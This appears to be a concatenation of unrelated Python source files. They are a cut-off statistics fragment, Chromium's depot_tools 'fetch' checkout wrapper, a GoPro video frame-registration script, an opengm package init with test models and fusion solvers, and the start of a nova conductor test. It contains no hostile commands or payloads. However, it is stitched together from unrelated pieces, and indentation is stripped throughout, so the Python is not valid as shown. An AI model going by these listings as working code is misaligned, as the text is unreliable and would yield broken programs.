stats= self._update_statistics(new_stats, stats)
# Compute the actual patterns
return self._compute_patterns(stats)
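# Illustrative sketch of the aggregation rule in _update_statistics() above:
# each per-batch statistic is a mean over `cnt` samples, and two batches are
# combined as a count-weighted average. The numbers below are hypothetical.
def _running_mean_example():
    cnt_a, mean_a = 4.0, 2.0   # first batch: 4 samples with mean 2
    cnt_b, mean_b = 4.0, 6.0   # second batch: 4 samples with mean 6
    total = cnt_a + cnt_b
    combined = cnt_a / total * mean_a + cnt_b / total * mean_b
    assert combined == 4.0     # identical to the mean over all 8 samples
    return combined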
|
|
#!/usr/bin/env python
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Tool to perform checkouts in one easy command line!
Usage:
fetch <recipe> [--property=value [--property2=value2 ...]]
This script is a wrapper around various version control and repository
checkout commands. It requires a |recipe| name, fetches data from that
recipe in depot_tools/recipes, and then performs all necessary inits,
checkouts, pulls, fetches, etc.
Optional arguments may be passed on the command line in key-value pairs.
These parameters will be passed through to the recipe's main method.
"""
import json
import optparse
import os
import pipes
import subprocess
import sys
import textwrap
from distutils import spawn
SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__))
#################################################
# Checkout class definitions.
#################################################
class Checkout(object):
"""Base class for implementing different types of checkouts.
Attributes:
|base|: the absolute path of the directory in which this script is run.
|spec|: the spec for this checkout as returned by the recipe. Different
subclasses will expect different keys in this dictionary.
|root|: the directory into which the checkout will be performed, as returned
by the recipe. This is a relative path from |base|.
"""
def __init__(self, options, spec, root):
self.base = os.getcwd()
self.options = options
self.spec = spec
self.root = root
def exists(self):
pass
def init(self):
pass
def sync(self):
pass
def run(self, cmd, **kwargs):
print 'Running: %s' % (' '.join(pipes.quote(x) for x in cmd))
if self.options.dry_run:
return ''
return subprocess.check_output(cmd, **kwargs)
class GclientCheckout(Checkout):
def run_gclient(self, *cmd, **kwargs):
if not spawn.find_executable('gclient'):
cmd_prefix = (sys.executable, os.path.join(SCRIPT_PATH, 'gclient.py'))
else:
cmd_prefix = ('gclient',)
return self.run(cmd_prefix + cmd, **kwargs)
def exists(self):
try:
gclient_root = self.run_gclient('root').strip()
return (os.path.exists(os.path.join(gclient_root, '.gclient')) or
os.path.exists(os.path.join(os.getcwd(), self.root)))
except subprocess.CalledProcessError:
pass
return os.path.exists(os.path.join(os.getcwd(), self.root))
class GitCheckout(Checkout):
def run_git(self, *cmd, **kwargs):
if sys.platform == 'win32' and not spawn.find_executable('git'):
git_path = os.path.join(SCRIPT_PATH, 'git.bat')
else:
git_path = 'git'
return self.run((git_path,) + cmd, **kwargs)
class SvnCheckout(Checkout):
def run_svn(self, *cmd, **kwargs):
if sys.platform == 'win32' and not spawn.find_executable('svn'):
svn_path = os.path.join(SCRIPT_PATH, 'svn_bin', 'svn.exe')
else:
svn_path = 'svn'
return self.run((svn_path,) + cmd, **kwargs)
class GclientGitCheckout(GclientCheckout, GitCheckout):
def __init__(self, options, spec, root):
super(GclientGitCheckout, self).__init__(options, spec, root)
assert 'solutions' in self.spec
def _format_spec(self):
def _format_literal(lit):
if isinstance(lit, basestring):
return '"%s"' % lit
if isinstance(lit, list):
return '[%s]' % ', '.join(_format_literal(i) for i in lit)
return '%r' % lit
soln_strings = []
for soln in self.spec['solutions']:
soln_string= '\n'.join(' "%s": %s,' % (key, _format_literal(value))
for key, value in soln.iteritems())
soln_strings.append(' {\n%s\n },' % soln_string)
gclient_spec = 'solutions = [\n%s\n]\n' % '\n'.join(soln_strings)
extra_keys = ['target_os', 'target_os_only']
gclient_spec += ''.join('%s = %s\n' % (key, _format_literal(self.spec[key]))
for key in extra_keys if key in self.spec)
return gclient_spec
def init(self):
# Configure and do the gclient checkout.
self.run_gclient('config', '--spec', self._format_spec())
sync_cmd = ['sync']
if self.options.nohooks:
sync_cmd.append('--nohooks')
if self.options.no_history:
sync_cmd.append('--no-history')
if self.spec.get('with_branch_heads', False):
sync_cmd.append('--with_branch_heads')
self.run_gclient(*sync_cmd)
# Configure git.
wd = os.path.join(self.base, self.root)
if self.options.dry_run:
print 'cd %s' % wd
self.run_git(
'submodule', 'foreach',
'git config -f $toplevel/.git/config submodule.$name.ignore all',
cwd=wd)
self.run_git(
'config', '--add', 'remote.origin.fetch',
'+refs/tags/*:refs/tags/*', cwd=wd)
self.run_git('config', 'diff.ignoreSubmodules', 'all', cwd=wd)
class GclientGitSvnCheckout(GclientGitCheckout, SvnCheckout):
def __init__(self, options, spec, root):
super(GclientGitSvnCheckout, self).__init__(options, spec, root)
def init(self):
# Ensure we are authenticated with subversion for all submodules.
git_svn_dirs = json.loads(self.spec.get('submodule_git_svn_spec', '{}'))
git_svn_dirs.update({self.root: self.spec})
for _, svn_spec in git_svn_dirs.iteritems():
if svn_spec.get('svn_url'):
try:
self.run_svn('ls', '--non-interactive', svn_spec['svn_url'])
except subprocess.CalledProcessError:
print 'Please run `svn ls %s`' % svn_spec['svn_url']
return 1
super(GclientGitSvnCheckout, self).init()
# Configure git-svn.
for path, svn_spec in git_svn_dirs.iteritems():
real_path = os.path.join(*path.split('/'))
if real_path != self.root:
real_path = os.path.join(self.root, real_path)
wd = os.path.join(self.base, real_path)
if self.options.dry_run:
print 'cd %s' % wd
if svn_spec.get('auto'):
self.run_git('auto-svn', cwd=wd)
continue
self.run_git('svn', 'init', svn_spec['svn_url'], cwd=wd)
self.run_git('config', '--unset-all', 'svn-remote.svn.fetch', cwd=wd)
for svn_branch, git_ref in svn_spec.get('git_svn_fetch', {}).items():
self.run_git('config', '--add', 'svn-remote.svn.fetch',
'%s:%s' % (svn_branch, git_ref), cwd=wd)
for svn_branch, git_ref in svn_spec.get('git_svn_branches', {}).items():
self.run_git('config', '--add', 'svn-remote.svn.branches',
'%s:%s' % (svn_branch, git_ref), cwd=wd)
self.run_git('svn', 'fetch', cwd=wd)
CHECKOUT_TYPE_MAP = {
'gclient': GclientCheckout,
'gclient_git': GclientGitCheckout,
'gclient_git_svn': GclientGitSvnCheckout,
'git': GitCheckout,
}
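# Illustrative note (not used by the tool): a spec whose 'type' is 'gclient_git'
# is dispatched to GclientGitCheckout via this map, e.g.
#
#   CHECKOUT_TYPE_MAP['gclient_git'](options, spec['gclient_git_spec'], root)
#
# which is what CheckoutFactory() below does, with a friendlier error message.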
def CheckoutFactory(type_name, options, spec, root):
"""Factory to build Checkout class instances."""
class_ = CHECKOUT_TYPE_MAP.get(type_name)
if not class_:
raise KeyError('unrecognized checkout type: %s' % type_name)
return class_(options, spec, root)
#################################################
# Utility function and file entry point.
#################################################
def usage(msg=None):
"""Print help and exit."""
if msg:
print 'Error:', msg
print textwrap.dedent("""\
usage: %s [options] <recipe> [--property=value [--property2=value2 ...]]
This script can be used to download the Chromium sources. See
http://www.chromium.org/developers/how-tos/get-the-code
for full usage instructions.
Valid options:
-h, --help, help Print this message.
--nohooks Don't run hooks after checkout.
-n, --dry-run Don't run commands, only print them.
--no-history Perform shallow clones, don't fetch the full git history.
Valid fetch recipes:""") % os.path.basename(sys.argv[0])
recipes_dir = os.path.join(SCRIPT_PATH, 'recipes')
recipes = [f[:-3] for f in os.listdir(recipes_dir) if f.endswith('.py')]
recipes.sort()
for fname in recipes:
print ' ' + fname
sys.exit(bool(msg))
def handle_args(argv):
"""Gets the recipe name from the command line arguments."""
if len(argv) <= 1:
usage('Must specify a recipe.')
if argv[1] in ('-h', '--help', 'help'):
usage()
dry_run = False
nohooks = False
no_history = False
while len(argv) >= 2:
arg = argv[1]
if not arg.startswith('-'):
break
argv.pop(1)
if arg in ('-n', '--dry-run'):
dry_run = True
elif arg == '--nohooks':
nohooks = True
elif arg == '--no-history':
no_history = True
else:
usage('Invalid option %s.' % arg)
def looks_like_arg(arg):
return arg.startswith('--') and arg.count('=') == 1
bad_parms = [x for x in argv[2:] if not looks_like_arg(x)]
if bad_parms:
usage('Got bad arguments %s' % bad_parms)
recipe = argv[1]
props = argv[2:]
return (
optparse.Values(
{'dry_run':dry_run, 'nohooks':nohooks, 'no_history': no_history }),
recipe,
props)
def run_recipe_fetch(recipe, props, aliased=False):
"""Invoke a recipe's fetch method with the passed-through args
and return its json output as a python object."""
recipe_path = os.path.abspath(os.path.join(SCRIPT_PATH, 'recipes', recipe))
if not os.path.exists(recipe_path + '.py'):
print "Could not find a recipe for %s" % recipe
sys.exit(1)
cmd = [sys.executable, recipe_path + '.py', 'fetch'] + props
result = subprocess.Popen(cmd, stdout=subprocess.PIPE).communicate()[0]
spec = json.loads(result)
if 'alias' in spec:
assert not aliased
return run_recipe_fetch(
spec['alias']['recipe'], spec['alias']['props'] + props, aliased=True)
cmd = [sys.executable, recipe_path + '.py', 'root']
result = subprocess.Popen(cmd, stdout=subprocess.PIPE).communicate()[0]
root = json.loads(result)
return spec, root
def run(options, spec, root):
"""Perform a checkout with the given type and configuration.
Args:
options: Options instance.
spec: Checkout configuration returned by the recipe's fetch_spec
method (checkout type, repository url, etc.).
root: The directory into which the repo expects to be checked out.
"""
assert 'type' in spec
checkout_type = spec['type']
checkout_spec = spec['%s_spec' % checkout_type]
try:
checkout = CheckoutFactory(checkout_type, options, checkout_spec, root)
except KeyError:
return 1
if checkout.exists():
print 'Your current directory appears to already contain, or be part of, '
print 'a checkout. "fetch" is used only to get new checkouts. Use '
print '"gclient sync" to update existing checkouts.'
print
print 'Fetch also does not yet deal with partial checkouts, so if fetch'
print 'failed, delete the checkout and start over (crbug.com/230691).'
return 1
return checkout.init()
def main():
options, recipe, props = handle_args(sys.argv)
spec, root = run_recipe_fetch(recipe, props)
return run(options, spec, root)
if __name__ == '__main__':
try:
sys.exit(main())
except KeyboardInterrupt:
sys.stderr.write('interrupted\n')
sys.exit(1)
|
|
'''
Generate some random frames from a movie, and also plot out the color profiles.
Gareth flips the camera every 5m, and this causes a spike in the RGB signals. We use these spikes as markers that let us
register the videos. We use k-means to identify the middle of each burst of peak frames, and use the difference of those centers as the offset in the registration.
In this version, I create a directory for each of the movies and save between the min and max number of images per shot. The min/max are calculated from aligning the peaks.
'''
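# Rough outline of the registration approach implemented below: frames whose
# mean blue/green/red value exceeds 200 are collected as "peaks", vq.kmeans
# collapses each burst of peak frames into a single center per camera flip, and
# the per-video offset is taken from the differences between the sorted centers
# of the reference video and of each subsequent video.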
# coding: utf-8
import matplotlib
import cv2
matplotlib.use('agg')
from matplotlib import pyplot as plt
from matplotlib.font_manager import FontProperties
import numpy
from scipy.cluster import vq
import sys
import argparse
import random
import os
parser = argparse.ArgumentParser(description="Plot the color profiles of movies from Gareth's goPros")
parser.add_argument('-f', '--file', help='Movie file(s). You can provide more than one video and the first will be used to create the list of random images. Color plots will be made for all images.', required=True, nargs='+')
# parser.add_argument('-o', '--out', help='output file name to draw the graph to', required=True)
parser.add_argument('-n', '--number', help='Number of images to print', required=True)
parser.add_argument('-m', '--frames', help='Stop after this number of frames (default == all)', type=int)
parser.add_argument('-d', '--median', help='Calculate and plot the median color intensity instead of the mean color intensity. Note that the median is noisier and slower to compute than the mean', action='store_true')
parser.add_argument('-w', '--window', help='Window size to average the numbers over (try 1/100 * # images). If not provided the numbers are not averaged. 100 is a good starting point if you are not sure!')
parser.add_argument('-i', '--ignore', help='Number of frames at the beginning to ignore. If you want to run in a bit and ignore some frames, use this.', type=int, default=0);
args = parser.parse_args()
savedImages = {}
def movingAverage(interval, window_size):
window= numpy.ones(int(window_size))/float(window_size)
return numpy.convolve(interval, window, 'same')
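# Illustrative example (not part of the pipeline): movingAverage() is a simple
# box filter. With window_size=3 an input of [0, 0, 3, 0, 0] becomes roughly
# [0, 1, 1, 1, 0], because numpy.convolve(..., 'same') keeps the original
# length and averages each point with its neighbours.
def _moving_average_example():
    return movingAverage([0, 0, 3, 0, 0], 3)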
def plotProfile(plotname, data):
''' Plot a profile of the colors'''
dtc=None
if args.window:
dt=numpy.transpose(data)
for i in range(dt.shape[0]):
dt[i]=movingAverage(dt[i], args.window)
dtc=numpy.transpose(dt)
else:
dtc=data
fontP = FontProperties()
fontP.set_size('small')
fig = plt.figure()
ax = plt.subplot(111)
ax.plot(dtc)
#ax.set_xticklabels(xlabels, rotation=45, fontproperties=fontP)
#ax.set_xlabel('Image number in the series')
ax.set_ylabel('Reef colors')
box = ax.get_position()
#ax.set_position([box.x0, box.y0 + box.height * 0.1, box.width, box.height * 0.9])
#ax.set_position([box.x0, box.y0 + box.height * 0.1, box.width, box.height])
ax.set_position([box.x0, box.y0 + box.height * 0.1, box.width, box.height *0.85])
header=["blue", "green", "red"]
ax.legend((header), loc='upper center', bbox_to_anchor=(0.5, -0.10), ncol=4, prop=fontP)
fig.savefig(plotname)
def printImages(filename, imgs, band):
keys = imgs.keys()
if len(keys)-1 <= 0:
sys.stderr.write("No more images to write. skipped\n")
return
if not os.path.exists(str(band)):
os.mkdir(str(band))
for i in range(int(args.number)):
r = random.randint(0, len(imgs)-1)
savedImages[keys[r]] = band
cv2.imwrite(str(band) + os.path.sep + str(keys[r]) + "." + filename + ".JPG", imgs[keys[r]])
sys.stderr.write("Saved images from " + str(filename) + " after band " + str(band) + " are: " + " ".join(map (str, savedImages.keys())) + "\n")
def printAnImage(img, filename, count, loc):
outfile = str(loc) + os.path.sep + str(count) + "." + filename + ".JPG";
sys.stderr.write("Saving " + outfile + "\n")
cv2.imwrite(outfile, img)
## process the first image
vid = cv2.VideoCapture(args.file[0])
if vid.isOpened():
print("Reading video " + args.file[0])
else:
sys.stderr.write("There was an error opening " + args.file[0] + "\n")
sys.exit()
paths = args.file[0].split('/')
videoFileName = paths[-1]
sys.stderr.write("Parsing images in " + args.file[0] + " (" + videoFileName + ")\n")
ret, img = vid.read()
average=[]
count=0
band=1
allpeaks=[]
imgset = {}
lastimwrite=0
while (ret):
count += 1
if (count < args.ignore):
ret, img = vid.read()
continue
rgb=[]
for i in range(3):
channel = img[:,:,i]
if args.median:
rgb.append(numpy.median(channel))
else:
rgb.append(numpy.average(channel))
if (count % 1000) < 1:
sys.stderr.write(str(count) + ": " + str(rgb[0]) + " " + str(rgb[1]) + " " + str(rgb[2]) + "\n")
if rgb[0] > 200 or rgb[1] > 200 or rgb[2] > 200:
sys.stderr.write('Peak at ' + str(count) + " with blue: " + str(rgb[0]) + " green: " + str(rgb[1]) + " red: " + str(rgb[2]) + "\n")
allpeaks.append(count)
if count - lastimwrite > 300 and len(imgset.keys()) >= 1: # we may see several consecutive frames with B/G/R > 200, so require 10s between peaks (at 30 fps)
sys.stderr.write("Writing images at " + str(count) + "\n")
printImages(videoFileName, imgset, band)
band+=1
lastimwrite=count
imgset = {}
rint = random.randint(1, 100)
if rint == 1: # choose 1 in 100 images first, and then sample randomly from those
imgset[count]=img
average.append(rgb)
ret, img = vid.read()
if args.frames > 1 and count > args.frames:
ret = False
sys.stderr.write("Read " + str(count) + " images\n")
# finish off the file
allpeaks.append(count)
sys.stderr.write("Writing images at the end of the file\n")
printImages(videoFileName, imgset, band)
# now use kmeans to identify the rgb peaks.
peaks, variance = vq.kmeans(numpy.array(allpeaks), band)
peaks.sort()
sys.stderr.write("The peaks are at " + str(peaks) + "\n")
filename = videoFileName + ".profile.png"
filename = filename.replace('.MP4', '')
sys.stderr.write("Plotting a profile in " + filename + "\n")
plotProfile(filename, average)
## process the other files
for fileNo in range(1, len(args.file)):
sys.stderr.write("Processing " + args.file[fileNo] + "\n")
vid = cv2.VideoCapture(args.file[fileNo])
paths = args.file[fileNo].split('/')
videoFileName = paths[-1]
ret, img = vid.read()
average=[]
count=0
lastimwrite=0
myallpeaks = []
while (ret):
count+=1
if (count < args.ignore):
ret, img = vid.read()
continue
rgb=[]
for i in range(3):
channel = img[:,:,i]
if args.median:
rgb.append(numpy.median(channel))
else:
rgb.append(numpy.average(channel))
average.append(rgb)
if (count % 1000) < 1:
sys.stderr.write(videoFileName + " : " + str(count) + ": " + str(rgb[0]) + " " + str(rgb[1]) + " " + str(rgb[2]) + "\n")
if rgb[0] > 200 or rgb[1] > 200 or rgb[2] > 200:
sys.stderr.write('Peak at ' + str(count) + " with blue: " + str(rgb[0]) + " green: " + str(rgb[1]) + " red: " + str(rgb[2]) + "\n")
myallpeaks.append(count)
ret, img = vid.read()
# finish off the file
myallpeaks.append(count)
sys.stderr.write("Writing images at the end of the file\n")
printImages(videoFileName, imgset, band)
## do we have the same number of peaks
mypeaks, variance = vq.kmeans(numpy.array(myallpeaks), peaks)
mypeaks.sort()
sys.stderr.write("The peaks are at " + str(mypeaks) + "\n")
diff=[]
for p in mypeaks:
peakdiff=[]
for q in peaks:
peakdiff.append(abs(p-q))
peakdiff.sort()
diff.append(peakdiff[0])
diff.sort()
mindiff = diff[0]
maxdiff = diff[-1]
difference = int(numpy.average(diff))
sys.stderr.write("The average delay between " + videoFileName + " and " + args.file[0] + " is " + str(difference) + " frames from " + str(mindiff) + " to " + str(maxdiff) + ".\n")
filename = videoFileName + ".profile.png"
filename = filename.replace('.MP4', '')
plotProfile(filename, average)
sys.stderr.write("Running through the second iteration of " + videoFileName)
vid = cv2.VideoCapture(args.file[fileNo])
ret, img = vid.read()
count=0
while (ret):
count+=1
if (count < args.ignore):
ret, img = vid.read()
continue
for correctedImage in range(count - maxdiff, count - mindiff):
if correctedImage in savedImages:
outputlocation = os.path.sep.join([str(savedImages[correctedImage]), str(correctedImage)])
if not os.path.exists(outputlocation):
os.mkdir(outputlocation)
sys.stderr.write("Saving " + str(correctedImage) + " as we are at " + str(count) + "\n")
#printAnImage(img, videoFileName, correctedImage, savedImages[correctedImage])
printAnImage(img, videoFileName, count, outputlocation)
ret, img = vid.read()
|
|
#from opengmcore import _opengmcore.adder as adder
from opengmcore import *
from __version__ import version
from functionhelper import *
from _inf_param import _MetaInfParam , InfParam
from _visu import visualizeGm
from _misc import defaultAccumulator
from __version__ import version
import time
from _inference_interface_generator import _inject_interface , InferenceBase
import inference
import hdf5
import benchmark
# initialize solver/ inference dictionaries
_solverDicts=[
(inference.adder.minimizer.solver.__dict__ , 'adder', 'minimizer' ),
(inference.adder.maximizer.solver.__dict__, 'adder', 'maximizer' ),
(inference.adder.integrator.solver.__dict__, 'adder', 'integrator'),
(inference.multiplier.minimizer.solver.__dict__, 'multiplier', 'minimizer' ),
(inference.multiplier.maximizer.solver.__dict__, 'multiplier', 'maximizer' ),
(inference.multiplier.integrator.solver.__dict__,'multiplier', 'integrator')
]
for infClass,infName in _inject_interface(_solverDicts):
inference.__dict__[infName]=infClass
class Timer(object):
def __init__(self, name=None):
self.name = name
def __enter__(self):
if self.name:
print '[%s]' % self.name
self.tstart = time.time()
def __exit__(self, type, value, traceback):
#if self.name:
# print '[%s]' % self.name,
print ' Elapsed: %s' % (time.time() - self.tstart)
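# Example usage (illustrative): time a block of work.
#
#   with Timer('inference'):
#       do_something_expensive()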
def weightRandomizer(noiseType = 'normalAdd', noiseParam=1.0, seed=42, ignoreSeed = True):
p = inference.adder.minimizer.solver._WeightRandomizerParameter_()
ntenum = inference.adder.minimizer.solver._WeightRandomization_NoiseType_
if noiseType == 'none' or noiseType =='noNoise':
nt =ntenum.none
elif noiseType == 'normalAdd':
nt =ntenum.normalAdd
elif noiseType == 'normalMult':
nt =ntenum.normalMult
elif noiseType == 'uniformAdd':
nt =ntenum.uniformAdd
else:
raise RuntimeError("unknown noise type")
p.noiseType = nt
p.noiseParam = float(noiseParam)
p.seed = int(seed)
p.ignoreSeed = bool(ignoreSeed)
return p
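# Illustrative sketch: build a randomizer parameter that adds Gaussian noise
# with sigma 0.5 and a fixed seed. How the parameter is attached to a concrete
# solver's settings depends on that solver and is not shown here.
def _example_weight_randomizer():
    return weightRandomizer(noiseType='normalAdd', noiseParam=0.5, seed=7,
                            ignoreSeed=False)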
def saveGm(gm, f, d='gm'):
""" save a graphical model to a hdf5 file:
Args:
gm : graphical model to save
f : filepath
g : dataset (defaut : 'gm')
"""
hdf5.saveGraphicalModel(gm, f, d)
def loadGm(f, d='gm', operator='adder'):
""" save a graphical model to a hdf5 file:
Args:
f : filepath
g : dataset (defaut : 'gm')
operator : operator of the graphical model ('adder' / 'multiplier')
"""
if(operator=='adder'):
gm=adder.GraphicalModel()
elif(operator=='multiplier'):
gm=multiplier.GraphicalModel()
else:
raise RuntimeError("unknown operator: "+ operator)
hdf5.loadGraphicalModel(gm,f,d)
return gm
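# Illustrative round-trip (assumes the current directory is writable and the
# file name 'example_gm.h5' is free): build a small chain model, save it, and
# load it back under the same dataset name.
def _example_gm_hdf5_roundtrip():
    gm = TestModels.chainN(5, 2, 2)          # 5 variables, 2 labels, 2nd order
    saveGm(gm, 'example_gm.h5', d='gm')
    return loadGm('example_gm.h5', d='gm', operator='adder')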
class TestModels(object):
@staticmethod
def chain3(nVar,nLabels):
model=adder.GraphicalModel([nLabels]*nVar)
unaries = numpy.random.rand(nVar,nLabels)
model.addFactors(model.addFunctions(unaries),numpy.arange(nVar))
numpy.random.seed(42)
for x0 in range(nVar-2):
f=numpy.random.rand(nLabels,nLabels,nLabels)
model.addFactor(model.addFunction(f),[x0,x0+1,x0+2])
return model
@staticmethod
def chain4(nVar,nLabels):
model=adder.GraphicalModel([nLabels]*nVar)
unaries = numpy.random.rand(nVar,nLabels)
model.addFactors(model.addFunctions(unaries),numpy.arange(nVar))
numpy.random.seed(42)
for x0 in range(nVar-3):
f=numpy.random.rand(nLabels,nLabels,nLabels,nLabels)
model.addFactor(model.addFunction(f),[x0,x0+1,x0+2,x0+3])
return model
@staticmethod
def chainN(nVar,nLabels,order,nSpecialUnaries=0,beta=1.0):
model=adder.GraphicalModel([nLabels]*nVar)
unaries = numpy.random.rand(nVar,nLabels)
for sn in range(nSpecialUnaries):
r=int(numpy.random.rand(1)*nVar-1)
rl=int(numpy.random.rand(1)*nLabels-1)
unaries[r,rl]=0.0
model.addFactors(model.addFunctions(unaries),numpy.arange(nVar))
numpy.random.seed(42)
for x0 in range(nVar-(order-1)):
f=numpy.random.rand( *([nLabels]*order))
f*=beta
vis=numpy.arange(order)
vis+=x0
model.addFactor(model.addFunction(f),vis)
return model
@staticmethod
def secondOrderGrid(dx,dy,nLabels):
nVar=dx*dy
model=adder.GraphicalModel([nLabels]*nVar)
unaries = numpy.random.rand(nVar,nLabels)
model.addFactors(model.addFunctions(unaries),numpy.arange(nVar))
vis2Order=secondOrderGridVis(dx,dy,True)
nF2=len(vis2Order)#.shape[0]
f2s=numpy.random.rand(nF2,nLabels)
model.addFactors(model.addFunctions(f2s),vis2Order)
return model
class GenericTimingVisitor(object):
def __init__(self,visitNth=1,reserve=0,verbose=True,multiline=True):
self.visitNth=visitNth
self.reserve=reserve
self.verbose=verbose
self.multiline=multiline
self.values_ = None
self.runtimes_ = None
self.bounds_ = None
self.iterations_ = None
self.t0 = None
self.t1 = None
self.iterNr = 0
def getValues(self):
return numpy.require(self.values_,dtype=value_type)
def getTimes(self):
return numpy.require(self.runtimes_,dtype=value_type)
def getBounds(self):
return numpy.require(self.bounds_,dtype=value_type)
def getIterations(self):
return numpy.require(self.iterations_,dtype=value_type)
def begin(self,inf):
v = inf.value()
b = inf.bound()
self.values_ =[v]
self.bounds_ =[b]
self.runtimes_ =[0.0]
self.iterations_=[self.iterNr]
if self.verbose :
print 'Begin : %d Value : %f Bound : %f '%(self.iterNr,v,b)
# start the timing
self.t0 =time.time()
self.t1 =time.time()
def visit(self,inf):
if(self.iterNr==0 or self.iterNr%self.visitNth==0):
# "stop the timing"
self.t1=time.time()
# get the runtime of the run
rt=self.t1-self.t0
v = inf.value()
b = inf.bound()
if self.verbose :
print 'Step : %d Value : %f Bound : %f '%(self.iterNr,v,b)
# store results
self.values_.append(v)
self.bounds_.append(b)
self.runtimes_.append(rt)
self.iterations_.append(self.iterNr)
# increment iteration number
self.iterNr+=1
# restart the timing
self.t0=time.time()
else:
# increment iteration number
self.iterNr+=1
def end(self,inf):
# "stop the timing"
self.t1=time.time()
# get the runtime of the run
rt=self.t1-self.t0
v = inf.value()
b = inf.bound()
if self.verbose :
print 'End : %d Value : %f Bound : %f '%(self.iterNr,v,b)
# store results
self.values_.append(v)
self.bounds_.append(b)
self.runtimes_.append(rt)
self.iterations_.append(self.iterNr)
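# Hedged sketch of the begin/visit/end protocol driven by GenericTimingVisitor:
# any object that exposes value() and bound() can feed it. _FakeInf is purely
# illustrative; real solvers call the visitor from their infer() method.
class _FakeInf(object):
    def value(self):
        return 0.0
    def bound(self):
        return -1.0
def _example_timing_visitor():
    visitor = GenericTimingVisitor(visitNth=1, verbose=False)
    inf = _FakeInf()
    visitor.begin(inf)   # records the starting value/bound and starts the clock
    visitor.visit(inf)   # records one step together with its runtime
    visitor.end(inf)     # records the final value/bound
    return visitor.getValues(), visitor.getTimes()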
class __RandomFusion__(object):
def __init__(self,gm,accumulator=None,parameter=InfParam()):
if accumulator is None:
self.accumulator=defaultAccumulator(gm=gm)
else:
self.accumulator=accumulator
kwargs=parameter.kwargs
self.gm_=gm
self.steps = kwargs.get('steps', 100)
self.fusionSolver = kwargs.get('fusionSolver', 'lf2')
self.arg_ = None
self.value_ = None
self.fusionMover=inference.adder.minimizer.FusionMover(self.gm_)
self.nLabels = self.gm_.numberOfLabels(0)
self.nVar = self.gm_.numberOfVariables
def timingVisitor(self,visitNth=1,reserve=0,verbose=True,multiline=True):
return GenericTimingVisitor(visitNth,reserve,verbose,multiline)
def setStartingPoint(self,arg):
self.arg_=arg
self.value_ = self.gm_.evaluate(self.arg_)
def infer(self,visitor=None):
if(self.arg_ is None):
self.arg_ = numpy.zeros(self.gm_.numberOfVariables,dtype=label_type)
self.value_ = self.gm_.evaluate(self.arg_)
# start inference
if visitor is not None:
visitor.begin(self)
# start fusion moves
for x in range(self.steps):
randState=numpy.random.randint(low=0, high=self.nLabels, size=self.nVar).astype(label_type)
r = self.fusionMover.fuse(self.arg_,randState,self.fusionSolver)
self.arg_=r[0]
self.value_=r[1]
if visitor is not None:
    visitor.visit(self)
# end inference
if visitor is not None:
visitor.end(self)
def name(self):
return "RandomFusion"
def bound(self):
return -1.0*float('inf')
def arg(self):
return self.arg_
def value(self):
return self.value_
class __CheapInitialization__(object):
def __init__(self,gm,accumulator=None,parameter=InfParam()):
if accumulator is None:
self.accumulator=defaultAccumulator(gm=gm)
else:
self.accumulator=accumulator
kwargs=parameter.kwargs
self.gm_=gm
self.arg_ = None
self.value_ = None
self.initType = kwargs.get('initType', 'localOpt')
def timingVisitor(self,visitNth=1,reserve=0,verbose=True,multiline=True):
return GenericTimingVisitor(visitNth,reserve,verbose,multiline)
def setStartingPoint(self,arg):
self.arg_=arg
self.value_ = self.gm_.evaluate(self.arg_)
def infer(self,visitor=None):
if(self.arg_ is None):
self.arg_ = numpy.zeros(self.gm_.numberOfVariables,dtype=label_type)
self.value_ = self.gm_.evaluate(self.arg_)
# start inference
if visitor is not None:
visitor.begin(self)
if(self.initType=='localOpt'):
print "move local opt"
self.arg_ = self.gm_.moveLocalOpt('minimizer')
print "done"
if visitor is not None:
visitor.visit(self)
# end inference
if visitor is not None:
visitor.end(self)
def name(self):
return "CheapInitialization"
def bound(self):
return -1.0*float('inf')
def arg(self):
return self.arg_
def value(self):
return self.value_
inference.__dict__['CheapInitialization']=__CheapInitialization__
inference.__dict__['RandomFusion']=__RandomFusion__
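# Hedged usage sketch for the two wrappers registered above; they follow the
# same construct / infer / arg pattern as the built-in solvers. The 'steps'
# value and the visitor settings are illustrative.
def _example_random_fusion(gm):
    solver = inference.RandomFusion(gm, parameter=InfParam(steps=10))
    solver.infer(solver.timingVisitor(visitNth=1, verbose=False))
    return solver.arg(), solver.value()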
if __name__ == "__main__":
pass
|
|
# Copyright 2012 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for the conductor service."""
import mox
from nova.api.ec2 import ec2utils
from nova.compute import flavors
from nova.compute import task_states
from nova.compute import utils as compute_utils
from nova.compute import vm_states
from nova import conductor
from nova.conductor import api as conductor_api
from nova.conductor import manager as conductor_manager
from nova.conductor import rpcapi as conductor_rpcapi
from nova import context
from nova import db
from nova.db.sqlalchemy import models
from nova import exception as exc
from nova import notifications
from nova.objects import instance as instance_obj
from nova.openstack.common import jsonutils
from nova.openstack.common.notifier import api as notifier_api
from nova.openstack.common.notifier import test_notifier
from nova.openstack.common.rpc import common as rpc_common
from nova.openstack.common import timeutils
from nova import quota
from nova import test
from nova.tests.compute import test_compute
from nova.tests import fake_instance_actions
FAKE_IMAGE_REF = 'fake-image-ref'
class FakeContext(context.RequestContext):
def elevated(self):
"""Return a consistent elevated context so we can detect it."""
if not hasattr(self, '_elevated'):
self._elevated = super(FakeContext, self).elevated()
return self._elevated
class _BaseTestCase(object):
def setUp(self):
super(_BaseTestCase, self).setUp()
self.db = None
self.user_id = 'fake'
self.project_id = 'fake'
self.context = FakeContext(self.user_id, self.project_id)
notifier_api._reset_drivers()
self.addCleanup(notifier_api._reset_drivers)
self.flags(notification_driver=[test_notifier.__name__])
test_notifier.NOTIFICATIONS = []
def stub_out_client_exceptions(self):
def passthru(exceptions, func, *args, **kwargs):
return func(*args, **kwargs)
self.stubs.Set(rpc_common, 'catch_client_exception', passthru)
def _create_fake_instance(self, params=None, type_name='m1.tiny'):
if not params:
params = {}
inst = {}
inst['vm_state'] = vm_states.ACTIVE
inst['image_ref'] = FAKE_IMAGE_REF
inst['reservation_id'] = 'r-fakeres'
inst['user_id'] = self.user_id
inst['project_id'] = self.project_id
inst['host'] = 'fake_host'
